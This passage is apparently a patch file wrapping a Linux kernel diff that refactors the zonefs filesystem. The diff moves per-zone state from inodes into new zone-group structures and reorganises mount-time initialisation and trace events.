+-	.mmap		= zonefs_file_mmap,
+-	.llseek		= zonefs_file_llseek,
+-	.read_iter	= zonefs_file_read_iter,
+-	.write_iter	= zonefs_file_write_iter,
+-	.splice_read	= generic_file_splice_read,
+-	.splice_write	= iter_file_splice_write,
+-	.iopoll		= iocb_bio_iopoll,
+-};
+-
+ static struct kmem_cache *zonefs_inode_cachep;
+ 
+ static struct inode *zonefs_alloc_inode(struct super_block *sb)
+@@ -1282,7 +414,6 @@ static struct inode *zonefs_alloc_inode(struct super_block *sb)
+ 	inode_init_once(&zi->i_vnode);
+ 	mutex_init(&zi->i_truncate_mutex);
+ 	zi->i_wr_refcnt = 0;
+-	zi->i_flags = 0;
+ 
+ 	return &zi->i_vnode;
+ }
+@@ -1315,8 +446,8 @@ static int zonefs_statfs(struct dentry *dentry, struct kstatfs *buf)
+ 	buf->f_bavail = buf->f_bfree;
+ 
+ 	for (t = 0; t < ZONEFS_ZTYPE_MAX; t++) {
+-		if (sbi->s_nr_files[t])
+-			buf->f_files += sbi->s_nr_files[t] + 1;
++		if (sbi->s_zgroup[t].g_nr_zones)
++			buf->f_files += sbi->s_zgroup[t].g_nr_zones + 1;
+ 	}
+ 	buf->f_ffree = 0;
+ 
+@@ -1382,51 +513,85 @@ static int zonefs_parse_options(struct super_block *sb, char *options)
+ 		}
+ 	}
+ 
+-	return 0;
+-}
++	return 0;
++}
++
++static int zonefs_show_options(struct seq_file *seq, struct dentry *root)
++{
++	struct zonefs_sb_info *sbi = ZONEFS_SB(root->d_sb);
++
++	if (sbi->s_mount_opts & ZONEFS_MNTOPT_ERRORS_RO)
++		seq_puts(seq, ",errors=remount-ro");
++	if (sbi->s_mount_opts & ZONEFS_MNTOPT_ERRORS_ZRO)
++		seq_puts(seq, ",errors=zone-ro");
++	if (sbi->s_mount_opts & ZONEFS_MNTOPT_ERRORS_ZOL)
++		seq_puts(seq, ",errors=zone-offline");
++	if (sbi->s_mount_opts & ZONEFS_MNTOPT_ERRORS_REPAIR)
++		seq_puts(seq, ",errors=repair");
++
++	return 0;
++}
++
++static int zonefs_remount(struct super_block *sb, int *flags, char *data)
++{
++	sync_filesystem(sb);
++
++	return zonefs_parse_options(sb, data);
++}
++
++static int zonefs_inode_setattr(struct user_namespace *mnt_userns,
++				struct dentry *dentry, struct iattr *iattr)
++{
++	struct inode *inode = d_inode(dentry);
++	int ret;
++
++	if (unlikely(IS_IMMUTABLE(inode)))
++		return -EPERM;
++
++	ret = setattr_prepare(&init_user_ns, dentry, iattr);
++	if (ret)
++		return ret;
++
++	/*
++	 * Since files and directories cannot be created or deleted, do not
++	 * allow setting any write attributes on the sub-directories grouping
++	 * files by zone type.
++	 */
++	if ((iattr->ia_valid & ATTR_MODE) && S_ISDIR(inode->i_mode) &&
++	    (iattr->ia_mode & 0222))
++		return -EPERM;
++
++	if (((iattr->ia_valid & ATTR_UID) &&
++	     !uid_eq(iattr->ia_uid, inode->i_uid)) ||
++	    ((iattr->ia_valid & ATTR_GID) &&
++	     !gid_eq(iattr->ia_gid, inode->i_gid))) {
++		ret = dquot_transfer(mnt_userns, inode, iattr);
++		if (ret)
++			return ret;
++	}
+ 
+-static int zonefs_show_options(struct seq_file *seq, struct dentry *root)
+-{
+-	struct zonefs_sb_info *sbi = ZONEFS_SB(root->d_sb);
++	if (iattr->ia_valid & ATTR_SIZE) {
++		ret = zonefs_file_truncate(inode, iattr->ia_size);
++		if (ret)
++			return ret;
++	}
+ 
+-	if (sbi->s_mount_opts & ZONEFS_MNTOPT_ERRORS_RO)
+-		seq_puts(seq, ",errors=remount-ro");
+-	if (sbi->s_mount_opts & ZONEFS_MNTOPT_ERRORS_ZRO)
+-		seq_puts(seq, ",errors=zone-ro");
+-	if (sbi->s_mount_opts & ZONEFS_MNTOPT_ERRORS_ZOL)
+-		seq_puts(seq, ",errors=zone-offline");
+-	if (sbi->s_mount_opts & ZONEFS_MNTOPT_ERRORS_REPAIR)
+-		seq_puts(seq, ",errors=repair");
++	setattr_copy(&init_user_ns, inode, iattr);
+ 
+ 	return 0;
+ }
+ 
+-static int zonefs_remount(struct super_block *sb, int *flags, char *data)
+-{
+-	sync_filesystem(sb);
+-
+-	return zonefs_parse_options(sb, data);
+-}
+-
+-static const struct super_operations zonefs_sops = {
+-	.alloc_inode	= zonefs_alloc_inode,
+-	.free_inode	= zonefs_free_inode,
+-	.statfs		= zonefs_statfs,
+-	.remount_fs	= zonefs_remount,
+-	.show_options	= zonefs_show_options,
+-};
+-
+ static const struct inode_operations zonefs_dir_inode_operations = {
+ 	.lookup		= simple_lookup,
+ 	.setattr	= zonefs_inode_setattr,
+ };
+ 
+ static void zonefs_init_dir_inode(struct inode *parent, struct inode *inode,
+-				  enum zonefs_ztype type)
++				  enum zonefs_ztype ztype)
+ {
+ 	struct super_block *sb = parent->i_sb;
+ 
+-	inode->i_ino = bdev_nr_zones(sb->s_bdev) + type + 1;
++	inode->i_ino = bdev_nr_zones(sb->s_bdev) + ztype + 1;
+ 	inode_init_owner(&init_user_ns, inode, parent, S_IFDIR | 0555);
+ 	inode->i_op = &zonefs_dir_inode_operations;
+ 	inode->i_fop = &simple_dir_operations;
+@@ -1434,73 +599,38 @@ static void zonefs_init_dir_inode(struct inode *parent, struct inode *inode,
+ 	inc_nlink(parent);
+ }
+ 
+-static int zonefs_init_file_inode(struct inode *inode, struct blk_zone *zone,
+-				  enum zonefs_ztype type)
++static const struct inode_operations zonefs_file_inode_operations = {
++	.setattr	= zonefs_inode_setattr,
++};
++
++static void zonefs_init_file_inode(struct inode *inode,
++				   struct zonefs_zone *z)
+ {
+ 	struct super_block *sb = inode->i_sb;
+ 	struct zonefs_sb_info *sbi = ZONEFS_SB(sb);
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-	int ret = 0;
+-
+-	inode->i_ino = zone->start >> sbi->s_zone_sectors_shift;
+-	inode->i_mode = S_IFREG | sbi->s_perm;
+-
+-	zi->i_ztype = type;
+-	zi->i_zsector = zone->start;
+-	zi->i_zone_size = zone->len << SECTOR_SHIFT;
+-	if (zi->i_zone_size > bdev_zone_sectors(sb->s_bdev) << SECTOR_SHIFT &&
+-	    !(sbi->s_features & ZONEFS_F_AGGRCNV)) {
+-		zonefs_err(sb,
+-			   "zone size %llu doesn't match device's zone sectors %llu\n",
+-			   zi->i_zone_size,
+-			   bdev_zone_sectors(sb->s_bdev) << SECTOR_SHIFT);
+-		return -EINVAL;
+-	}
+ 
+-	zi->i_max_size = min_t(loff_t, MAX_LFS_FILESIZE,
+-			       zone->capacity << SECTOR_SHIFT);
+-	zi->i_wpoffset = zonefs_check_zone_condition(inode, zone, true, true);
++	inode->i_private = z;
+ 
++	inode->i_ino = z->z_sector >> sbi->s_zone_sectors_shift;
++	inode->i_mode = S_IFREG | sbi->s_perm;
+ 	inode->i_uid = sbi->s_uid;
+ 	inode->i_gid = sbi->s_gid;
+-	inode->i_size = zi->i_wpoffset;
+-	inode->i_blocks = zi->i_max_size >> SECTOR_SHIFT;
++	inode->i_size = z->z_wpoffset;
++	inode->i_blocks = z->z_capacity >> SECTOR_SHIFT;
+ 
+ 	inode->i_op = &zonefs_file_inode_operations;
+ 	inode->i_fop = &zonefs_file_operations;
+ 	inode->i_mapping->a_ops = &zonefs_file_aops;
+ 
+-	sb->s_maxbytes = max(zi->i_max_size, sb->s_maxbytes);
+-	sbi->s_blocks += zi->i_max_size >> sb->s_blocksize_bits;
+-	sbi->s_used_blocks += zi->i_wpoffset >> sb->s_blocksize_bits;
+-
+-	mutex_lock(&zi->i_truncate_mutex);
+-
+-	/*
+-	 * For sequential zones, make sure that any open zone is closed first
+-	 * to ensure that the initial number of open zones is 0, in sync with
+-	 * the open zone accounting done when the mount option
+-	 * ZONEFS_MNTOPT_EXPLICIT_OPEN is used.
+-	 */
+-	if (type == ZONEFS_ZTYPE_SEQ &&
+-	    (zone->cond == BLK_ZONE_COND_IMP_OPEN ||
+-	     zone->cond == BLK_ZONE_COND_EXP_OPEN)) {
+-		ret = zonefs_zone_mgmt(inode, REQ_OP_ZONE_CLOSE);
+-		if (ret)
+-			goto unlock;
+-	}
+-
+-	zonefs_account_active(inode);
+-
+-unlock:
+-	mutex_unlock(&zi->i_truncate_mutex);
+-
+-	return ret;
++	/* Update the inode access rights depending on the zone condition */
++	z->z_flags |= ZONEFS_ZONE_INIT_MODE;
++	zonefs_inode_update_mode(inode);
+ }
+ 
+ static struct dentry *zonefs_create_inode(struct dentry *parent,
+-					const char *name, struct blk_zone *zone,
+-					enum zonefs_ztype type)
++					  const char *name,
++					  struct zonefs_zone *z,
++					  enum zonefs_ztype ztype)
+ {
+ 	struct inode *dir = d_inode(parent);
+ 	struct dentry *dentry;
+@@ -1516,15 +646,10 @@ static struct dentry *zonefs_create_inode(struct dentry *parent,
+ 		goto dput;
+ 
+ 	inode->i_ctime = inode->i_mtime = inode->i_atime = dir->i_ctime;
+-	if (zone) {
+-		ret = zonefs_init_file_inode(inode, zone, type);
+-		if (ret) {
+-			iput(inode);
+-			goto dput;
+-		}
+-	} else {
+-		zonefs_init_dir_inode(dir, inode, type);
+-	}
++	if (z)
++		zonefs_init_file_inode(inode, z);
++	else
++		zonefs_init_dir_inode(dir, inode, ztype);
+ 
+ 	d_add(dentry, inode);
+ 	dir->i_size++;
+@@ -1540,100 +665,51 @@ dput:
+ struct zonefs_zone_data {
+ 	struct super_block	*sb;
+ 	unsigned int		nr_zones[ZONEFS_ZTYPE_MAX];
++	sector_t		cnv_zone_start;
+ 	struct blk_zone		*zones;
+ };
+ 
+ /*
+- * Create a zone group and populate it with zone files.
++ * Create the inodes for a zone group.
+  */
+-static int zonefs_create_zgroup(struct zonefs_zone_data *zd,
+-				enum zonefs_ztype type)
++static int zonefs_create_zgroup_inodes(struct super_block *sb,
++				       enum zonefs_ztype ztype)
+ {
+-	struct super_block *sb = zd->sb;
+ 	struct zonefs_sb_info *sbi = ZONEFS_SB(sb);
+-	struct blk_zone *zone, *next, *end;
+-	const char *zgroup_name;
+-	char *file_name;
++	struct zonefs_zone_group *zgroup = &sbi->s_zgroup[ztype];
+ 	struct dentry *dir, *dent;
+-	unsigned int n = 0;
+-	int ret;
++	char *file_name;
++	int i, ret = 0;
++
++	if (!zgroup)
++		return -ENOMEM;
+ 
+ 	/* If the group is empty, there is nothing to do */
+-	if (!zd->nr_zones[type])
++	if (!zgroup->g_nr_zones)
+ 		return 0;
+ 
+ 	file_name = kmalloc(ZONEFS_NAME_MAX, GFP_KERNEL);
+ 	if (!file_name)
+ 		return -ENOMEM;
+ 
+-	if (type == ZONEFS_ZTYPE_CNV)
+-		zgroup_name = "cnv";
+-	else
+-		zgroup_name = "seq";
+-
+-	dir = zonefs_create_inode(sb->s_root, zgroup_name, NULL, type);
++	dir = zonefs_create_inode(sb->s_root, zonefs_zgroup_name(ztype),
++				  NULL, ztype);
+ 	if (IS_ERR(dir)) {
+ 		ret = PTR_ERR(dir);
+ 		goto free;
+ 	}
+ 
+-	/*
+-	 * The first zone contains the super block: skip it.
+-	 */
+-	end = zd->zones + bdev_nr_zones(sb->s_bdev);
+-	for (zone = &zd->zones[1]; zone < end; zone = next) {
+-
+-		next = zone + 1;
+-		if (zonefs_zone_type(zone) != type)
+-			continue;
+-
+-		/*
+-		 * For conventional zones, contiguous zones can be aggregated
+-		 * together to form larger files. Note that this overwrites the
+-		 * length of the first zone of the set of contiguous zones
+-		 * aggregated together. If one offline or read-only zone is
+-		 * found, assume that all zones aggregated have the same
+-		 * condition.
+-		 */
+-		if (type == ZONEFS_ZTYPE_CNV &&
+-		    (sbi->s_features & ZONEFS_F_AGGRCNV)) {
+-			for (; next < end; next++) {
+-				if (zonefs_zone_type(next) != type)
+-					break;
+-				zone->len += next->len;
+-				zone->capacity += next->capacity;
+-				if (next->cond == BLK_ZONE_COND_READONLY &&
+-				    zone->cond != BLK_ZONE_COND_OFFLINE)
+-					zone->cond = BLK_ZONE_COND_READONLY;
+-				else if (next->cond == BLK_ZONE_COND_OFFLINE)
+-					zone->cond = BLK_ZONE_COND_OFFLINE;
+-			}
+-			if (zone->capacity != zone->len) {
+-				zonefs_err(sb, "Invalid conventional zone capacity\n");
+-				ret = -EINVAL;
+-				goto free;
+-			}
+-		}
+-
+-		/*
+-		 * Use the file number within its group as file name.
+-		 */
+-		snprintf(file_name, ZONEFS_NAME_MAX - 1, "%u", n);
+-		dent = zonefs_create_inode(dir, file_name, zone, type);
++	for (i = 0; i < zgroup->g_nr_zones; i++) {
++		/* Use the zone number within its group as the file name */
++		snprintf(file_name, ZONEFS_NAME_MAX - 1, "%u", i);
++		dent = zonefs_create_inode(dir, file_name,
++					   &zgroup->g_zones[i], ztype);
+ 		if (IS_ERR(dent)) {
+ 			ret = PTR_ERR(dent);
+-			goto free;
++			break;
+ 		}
+-
+-		n++;
+ 	}
+ 
+-	zonefs_info(sb, "Zone group \"%s\" has %u file%s\n",
+-		    zgroup_name, n, n > 1 ? "s" : "");
+-
+-	sbi->s_nr_files[type] = n;
+-	ret = 0;
+-
+ free:
+ 	kfree(file_name);
+ 
+@@ -1644,21 +720,38 @@ static int zonefs_get_zone_info_cb(struct blk_zone *zone, unsigned int idx,
+ 				   void *data)
+ {
+ 	struct zonefs_zone_data *zd = data;
++	struct super_block *sb = zd->sb;
++	struct zonefs_sb_info *sbi = ZONEFS_SB(sb);
++
++	/*
++	 * We do not care about the first zone: it contains the super block
++	 * and not exposed as a file.
++	 */
++	if (!idx)
++		return 0;
+ 
+ 	/*
+-	 * Count the number of usable zones: the first zone at index 0 contains
+-	 * the super block and is ignored.
++	 * Count the number of zones that will be exposed as files.
++	 * For sequential zones, we always have as many files as zones.
++	 * For conventional zones, the number of files depends on whether
++	 * conventional zone aggregation is enabled.
+ 	 */
+ 	switch (zone->type) {
+ 	case BLK_ZONE_TYPE_CONVENTIONAL:
+-		zone->wp = zone->start + zone->len;
+-		if (idx)
+-			zd->nr_zones[ZONEFS_ZTYPE_CNV]++;
++		if (sbi->s_features & ZONEFS_F_AGGRCNV) {
++			/* One file per set of contiguous conventional zones */
++			if (!(sbi->s_zgroup[ZONEFS_ZTYPE_CNV].g_nr_zones) ||
++			    zone->start != zd->cnv_zone_start)
++				sbi->s_zgroup[ZONEFS_ZTYPE_CNV].g_nr_zones++;
++			zd->cnv_zone_start = zone->start + zone->len;
++		} else {
++			/* One file per zone */
++			sbi->s_zgroup[ZONEFS_ZTYPE_CNV].g_nr_zones++;
++		}
+ 		break;
+ 	case BLK_ZONE_TYPE_SEQWRITE_REQ:
+ 	case BLK_ZONE_TYPE_SEQWRITE_PREF:
+-		if (idx)
+-			zd->nr_zones[ZONEFS_ZTYPE_SEQ]++;
++		sbi->s_zgroup[ZONEFS_ZTYPE_SEQ].g_nr_zones++;
+ 		break;
+ 	default:
+ 		zonefs_err(zd->sb, "Unsupported zone type 0x%x\n",
+@@ -1698,11 +791,173 @@ static int zonefs_get_zone_info(struct zonefs_zone_data *zd)
+ 	return 0;
+ }
+ 
+-static inline void zonefs_cleanup_zone_info(struct zonefs_zone_data *zd)
++static inline void zonefs_free_zone_info(struct zonefs_zone_data *zd)
+ {
+ 	kvfree(zd->zones);
+ }
+ 
++/*
++ * Allocate a zone group and initialize it using the device zone information.
++ */
++static int zonefs_init_zgroup(struct super_block *sb,
++			      struct zonefs_zone_data *zd,
++			      enum zonefs_ztype ztype)
++{
++	struct zonefs_sb_info *sbi = ZONEFS_SB(sb);
++	struct zonefs_zone_group *zgroup = &sbi->s_zgroup[ztype];
++	struct blk_zone *zone, *next, *end;
++	struct zonefs_zone *z;
++	unsigned int n = 0;
++	int ret;
++
++	/* Allocate the zone group. If it is empty, we have nothing to do. */
++	if (!zgroup->g_nr_zones)
++		return 0;
++
++	zgroup->g_zones = kvcalloc(zgroup->g_nr_zones,
++				   sizeof(struct zonefs_zone), GFP_KERNEL);
++	if (!zgroup->g_zones)
++		return -ENOMEM;
++
++	/*
++	 * Initialize the zone groups using the device zone information.
++	 * We always skip the first zone as it contains the super block
++	 * and is not used to back a file.
++	 */
++	end = zd->zones + bdev_nr_zones(sb->s_bdev);
++	for (zone = &zd->zones[1]; zone < end; zone = next) {
++
++		next = zone + 1;
++		if (zonefs_zone_type(zone) != ztype)
++			continue;
++
++		if (WARN_ON_ONCE(n >= zgroup->g_nr_zones))
++			return -EINVAL;
++
++		/*
++		 * For conventional zones, contiguous zones can be aggregated
++		 * together to form larger files. Note that this overwrites the
++		 * length of the first zone of the set of contiguous zones
++		 * aggregated together. If one offline or read-only zone is
++		 * found, assume that all zones aggregated have the same
++		 * condition.
++		 */
++		if (ztype == ZONEFS_ZTYPE_CNV &&
++		    (sbi->s_features & ZONEFS_F_AGGRCNV)) {
++			for (; next < end; next++) {
++				if (zonefs_zone_type(next) != ztype)
++					break;
++				zone->len += next->len;
++				zone->capacity += next->capacity;
++				if (next->cond == BLK_ZONE_COND_READONLY &&
++				    zone->cond != BLK_ZONE_COND_OFFLINE)
++					zone->cond = BLK_ZONE_COND_READONLY;
++				else if (next->cond == BLK_ZONE_COND_OFFLINE)
++					zone->cond = BLK_ZONE_COND_OFFLINE;
++			}
++		}
++
++		z = &zgroup->g_zones[n];
++		if (ztype == ZONEFS_ZTYPE_CNV)
++			z->z_flags |= ZONEFS_ZONE_CNV;
++		z->z_sector = zone->start;
++		z->z_size = zone->len << SECTOR_SHIFT;
++		if (z->z_size > bdev_zone_sectors(sb->s_bdev) << SECTOR_SHIFT &&
++		    !(sbi->s_features & ZONEFS_F_AGGRCNV)) {
++			zonefs_err(sb,
++				"Invalid zone size %llu (device zone sectors %llu)\n",
++				z->z_size,
++				bdev_zone_sectors(sb->s_bdev) << SECTOR_SHIFT);
++			return -EINVAL;
++		}
++
++		z->z_capacity = min_t(loff_t, MAX_LFS_FILESIZE,
++				      zone->capacity << SECTOR_SHIFT);
++		z->z_wpoffset = zonefs_check_zone_condition(sb, z, zone);
++
++		sb->s_maxbytes = max(z->z_capacity, sb->s_maxbytes);
++		sbi->s_blocks += z->z_capacity >> sb->s_blocksize_bits;
++		sbi->s_used_blocks += z->z_wpoffset >> sb->s_blocksize_bits;
++
++		/*
++		 * For sequential zones, make sure that any open zone is closed
++		 * first to ensure that the initial number of open zones is 0,
++		 * in sync with the open zone accounting done when the mount
++		 * option ZONEFS_MNTOPT_EXPLICIT_OPEN is used.
++		 */
++		if (ztype == ZONEFS_ZTYPE_SEQ &&
++		    (zone->cond == BLK_ZONE_COND_IMP_OPEN ||
++		     zone->cond == BLK_ZONE_COND_EXP_OPEN)) {
++			ret = zonefs_zone_mgmt(sb, z, REQ_OP_ZONE_CLOSE);
++			if (ret)
++				return ret;
++		}
++
++		zonefs_account_active(sb, z);
++
++		n++;
++	}
++
++	if (WARN_ON_ONCE(n != zgroup->g_nr_zones))
++		return -EINVAL;
++
++	zonefs_info(sb, "Zone group \"%s\" has %u file%s\n",
++		    zonefs_zgroup_name(ztype),
++		    zgroup->g_nr_zones,
++		    zgroup->g_nr_zones > 1 ? "s" : "");
++
++	return 0;
++}
++
++static void zonefs_free_zgroups(struct super_block *sb)
++{
++	struct zonefs_sb_info *sbi = ZONEFS_SB(sb);
++	enum zonefs_ztype ztype;
++
++	if (!sbi)
++		return;
++
++	for (ztype = 0; ztype < ZONEFS_ZTYPE_MAX; ztype++) {
++		kvfree(sbi->s_zgroup[ztype].g_zones);
++		sbi->s_zgroup[ztype].g_zones = NULL;
++	}
++}
++
++/*
++ * Get the device zone information and initialize all zone groups.
++ */
++static int zonefs_init_zgroups(struct super_block *sb)
++{
++	struct zonefs_zone_data zd;
++	enum zonefs_ztype ztype;
++	int ret;
++
++	/* First get the device zone information */
++	memset(&zd, 0, sizeof(struct zonefs_zone_data));
++	zd.sb = sb;
++	ret = zonefs_get_zone_info(&zd);
++	if (ret)
++		goto cleanup;
++
++	/* Allocate and initialize the zone groups */
++	for (ztype = 0; ztype < ZONEFS_ZTYPE_MAX; ztype++) {
++		ret = zonefs_init_zgroup(sb, &zd, ztype);
++		if (ret) {
++			zonefs_info(sb,
++				    "Zone group \"%s\" initialization failed\n",
++				    zonefs_zgroup_name(ztype));
++			break;
++		}
++	}
++
++cleanup:
++	zonefs_free_zone_info(&zd);
++	if (ret)
++		zonefs_free_zgroups(sb);
++
++	return ret;
++}
++
+ /*
+  * Read super block information from the device.
+  */
+@@ -1785,6 +1040,14 @@ free_page:
+ 	return ret;
+ }
+ 
++static const struct super_operations zonefs_sops = {
++	.alloc_inode	= zonefs_alloc_inode,
++	.free_inode	= zonefs_free_inode,
++	.statfs		= zonefs_statfs,
++	.remount_fs	= zonefs_remount,
++	.show_options	= zonefs_show_options,
++};
++
+ /*
+  * Check that the device is zoned. If it is, get the list of zones and create
+  * sub-directories and files according to the device zone configuration and
+@@ -1792,7 +1055,6 @@ free_page:
+  */
+ static int zonefs_fill_super(struct super_block *sb, void *data, int silent)
+ {
+-	struct zonefs_zone_data zd;
+ 	struct zonefs_sb_info *sbi;
+ 	struct inode *inode;
+ 	enum zonefs_ztype t;
+@@ -1845,16 +1107,6 @@ static int zonefs_fill_super(struct super_block *sb, void *data, int silent)
+ 	if (ret)
+ 		return ret;
+ 
+-	memset(&zd, 0, sizeof(struct zonefs_zone_data));
+-	zd.sb = sb;
+-	ret = zonefs_get_zone_info(&zd);
+-	if (ret)
+-		goto cleanup;
+-
+-	ret = zonefs_sysfs_register(sb);
+-	if (ret)
+-		goto cleanup;
+-
+ 	zonefs_info(sb, "Mounting %u zones", bdev_nr_zones(sb->s_bdev));
+ 
+ 	if (!sbi->s_max_wro_seq_files &&
+@@ -1865,6 +1117,11 @@ static int zonefs_fill_super(struct super_block *sb, void *data, int silent)
+ 		sbi->s_mount_opts &= ~ZONEFS_MNTOPT_EXPLICIT_OPEN;
+ 	}
+ 
++	/* Initialize the zone groups */
++	ret = zonefs_init_zgroups(sb);
++	if (ret)
++		goto cleanup;
++
+ 	/* Create root directory inode */
+ 	ret = -ENOMEM;
+ 	inode = new_inode(sb);
+@@ -1884,13 +1141,19 @@ static int zonefs_fill_super(struct super_block *sb, void *data, int silent)
+ 
+ 	/* Create and populate files in zone groups directories */
+ 	for (t = 0; t < ZONEFS_ZTYPE_MAX; t++) {
+-		ret = zonefs_create_zgroup(&zd, t);
++		ret = zonefs_create_zgroup_inodes(sb, t);
+ 		if (ret)
+-			break;
++			goto cleanup;
+ 	}
+ 
++	ret = zonefs_sysfs_register(sb);
++	if (ret)
++		goto cleanup;
++
++	return 0;
++
+ cleanup:
+-	zonefs_cleanup_zone_info(&zd);
++	zonefs_free_zgroups(sb);
+ 
+ 	return ret;
+ }
+@@ -1909,6 +1172,7 @@ static void zonefs_kill_super(struct super_block *sb)
+ 		d_genocide(sb->s_root);
+ 
+ 	zonefs_sysfs_unregister(sb);
++	zonefs_free_zgroups(sb);
+ 	kill_block_super(sb);
+ 	kfree(sbi);
+ }
+diff --git a/fs/zonefs/trace.h b/fs/zonefs/trace.h
+index 42edcfd393ed2..9969db3a9c7dc 100644
+--- a/fs/zonefs/trace.h
++++ b/fs/zonefs/trace.h
+@@ -20,8 +20,9 @@
+ #define show_dev(dev) MAJOR(dev), MINOR(dev)
+ 
+ TRACE_EVENT(zonefs_zone_mgmt,
+-	    TP_PROTO(struct inode *inode, enum req_op op),
+-	    TP_ARGS(inode, op),
++	    TP_PROTO(struct super_block *sb, struct zonefs_zone *z,
++		     enum req_op op),
++	    TP_ARGS(sb, z, op),
+ 	    TP_STRUCT__entry(
+ 			     __field(dev_t, dev)
+ 			     __field(ino_t, ino)
+@@ -30,12 +31,12 @@ TRACE_EVENT(zonefs_zone_mgmt,
+ 			     __field(sector_t, nr_sectors)
+ 	    ),
+ 	    TP_fast_assign(
+-			   __entry->dev = inode->i_sb->s_dev;
+-			   __entry->ino = inode->i_ino;
++			   __entry->dev = sb->s_dev;
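++			   /* Derive the inode number from the zone start sector. */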
++			   __entry->ino =
++				z->z_sector >> ZONEFS_SB(sb)->s_zone_sectors_shift;
+ 			   __entry->op = op;
+-			   __entry->sector = ZONEFS_I(inode)->i_zsector;
+-			   __entry->nr_sectors =
+-				   ZONEFS_I(inode)->i_zone_size >> SECTOR_SHIFT;
++			   __entry->sector = z->z_sector;
++			   __entry->nr_sectors = z->z_size >> SECTOR_SHIFT;
+ 	    ),
+ 	    TP_printk("bdev=(%d,%d), ino=%lu op=%s, sector=%llu, nr_sectors=%llu",
+ 		      show_dev(__entry->dev), (unsigned long)__entry->ino,
+@@ -58,9 +59,10 @@ TRACE_EVENT(zonefs_file_dio_append,
+ 	    TP_fast_assign(
+ 			   __entry->dev = inode->i_sb->s_dev;
+ 			   __entry->ino = inode->i_ino;
+-			   __entry->sector = ZONEFS_I(inode)->i_zsector;
++			   __entry->sector = zonefs_inode_zone(inode)->z_sector;
+ 			   __entry->size = size;
+-			   __entry->wpoffset = ZONEFS_I(inode)->i_wpoffset;
++			   __entry->wpoffset =
++				zonefs_inode_zone(inode)->z_wpoffset;
+ 			   __entry->ret = ret;
+ 	    ),
+ 	    TP_printk("bdev=(%d, %d), ino=%lu, sector=%llu, size=%zu, wpoffset=%llu, ret=%zu",
+diff --git a/fs/zonefs/zonefs.h b/fs/zonefs/zonefs.h
+index 1dbe78119ff16..2d626e18b1411 100644
+--- a/fs/zonefs/zonefs.h
++++ b/fs/zonefs/zonefs.h
+@@ -39,31 +39,47 @@ static inline enum zonefs_ztype zonefs_zone_type(struct blk_zone *zone)
+ 	return ZONEFS_ZTYPE_SEQ;
+ }
+ 
+-#define ZONEFS_ZONE_OPEN	(1U << 0)
+-#define ZONEFS_ZONE_ACTIVE	(1U << 1)
+-#define ZONEFS_ZONE_OFFLINE	(1U << 2)
+-#define ZONEFS_ZONE_READONLY	(1U << 3)
++#define ZONEFS_ZONE_INIT_MODE	(1U << 0)
++#define ZONEFS_ZONE_OPEN	(1U << 1)
++#define ZONEFS_ZONE_ACTIVE	(1U << 2)
++#define ZONEFS_ZONE_OFFLINE	(1U << 3)
++#define ZONEFS_ZONE_READONLY	(1U << 4)
++#define ZONEFS_ZONE_CNV		(1U << 31)
+ 
+ /*
+- * In-memory inode data.
++ * In-memory per-file inode zone data.
+  */
+-struct zonefs_inode_info {
+-	struct inode		i_vnode;
++struct zonefs_zone {
++	/* Zone state flags */
++	unsigned int		z_flags;
+ 
+-	/* File zone type */
+-	enum zonefs_ztype	i_ztype;
++	/* Zone start sector (512B unit) */
++	sector_t		z_sector;
+ 
+-	/* File zone start sector (512B unit) */
+-	sector_t		i_zsector;
++	/* Zone size (bytes) */
++	loff_t			z_size;
+ 
+-	/* File zone write pointer position (sequential zones only) */
+-	loff_t			i_wpoffset;
++	/* Zone capacity (file maximum size, bytes) */
++	loff_t			z_capacity;
+ 
+-	/* File maximum size */
+-	loff_t			i_max_size;
++	/* Write pointer offset in the zone (sequential zones only, bytes) */
++	loff_t			z_wpoffset;
++};
+ 
+-	/* File zone size */
+-	loff_t			i_zone_size;
++/*
++ * In-memory zone group information: all zones of a group are exposed
++ * as files, one file per zone.
++ */
++struct zonefs_zone_group {
++	unsigned int		g_nr_zones;
++	struct zonefs_zone	*g_zones;
++};
++
++/*
++ * In-memory inode data.
++ */
++struct zonefs_inode_info {
++	struct inode		i_vnode;
+ 
+ 	/*
+ 	 * To serialise fully against both syscall and mmap based IO and
+@@ -82,7 +98,6 @@ struct zonefs_inode_info {
+ 
+ 	/* guarded by i_truncate_mutex */
+ 	unsigned int		i_wr_refcnt;
+-	unsigned int		i_flags;
+ };
+ 
+ static inline struct zonefs_inode_info *ZONEFS_I(struct inode *inode)
+@@ -90,6 +105,31 @@ static inline struct zonefs_inode_info *ZONEFS_I(struct inode *inode)
+ 	return container_of(inode, struct zonefs_inode_info, i_vnode);
+ }
+ 
++static inline bool zonefs_zone_is_cnv(struct zonefs_zone *z)
++{
++	return z->z_flags & ZONEFS_ZONE_CNV;
++}
++
++static inline bool zonefs_zone_is_seq(struct zonefs_zone *z)
++{
++	return !zonefs_zone_is_cnv(z);
++}
++
++static inline struct zonefs_zone *zonefs_inode_zone(struct inode *inode)
++{
++	return inode->i_private;
++}
++
++static inline bool zonefs_inode_is_cnv(struct inode *inode)
++{
++	return zonefs_zone_is_cnv(zonefs_inode_zone(inode));
++}
++
++static inline bool zonefs_inode_is_seq(struct inode *inode)
++{
++	return zonefs_zone_is_seq(zonefs_inode_zone(inode));
++}
++
+ /*
+  * On-disk super block (block 0).
+  */
+@@ -181,7 +221,7 @@ struct zonefs_sb_info {
+ 	uuid_t			s_uuid;
+ 	unsigned int		s_zone_sectors_shift;
+ 
+-	unsigned int		s_nr_files[ZONEFS_ZTYPE_MAX];
++	struct zonefs_zone_group s_zgroup[ZONEFS_ZTYPE_MAX];
+ 
+ 	loff_t			s_blocks;
+ 	loff_t			s_used_blocks;
+@@ -209,6 +249,28 @@ static inline struct zonefs_sb_info *ZONEFS_SB(struct super_block *sb)
+ #define zonefs_warn(sb, format, args...)	\
+ 	pr_warn("zonefs (%s) WARNING: " format, sb->s_id, ## args)
+ 
++/* In super.c */
++void zonefs_inode_account_active(struct inode *inode);
++int zonefs_inode_zone_mgmt(struct inode *inode, enum req_op op);
++void zonefs_i_size_write(struct inode *inode, loff_t isize);
++void zonefs_update_stats(struct inode *inode, loff_t new_isize);
++void __zonefs_io_error(struct inode *inode, bool write);
++
++static inline void zonefs_io_error(struct inode *inode, bool write)
++{
++	struct zonefs_inode_info *zi = ZONEFS_I(inode);
++
++	mutex_lock(&zi->i_truncate_mutex);
++	__zonefs_io_error(inode, write);
++	mutex_unlock(&zi->i_truncate_mutex);
++}
++
++/* In file.c */
++extern const struct address_space_operations zonefs_file_aops;
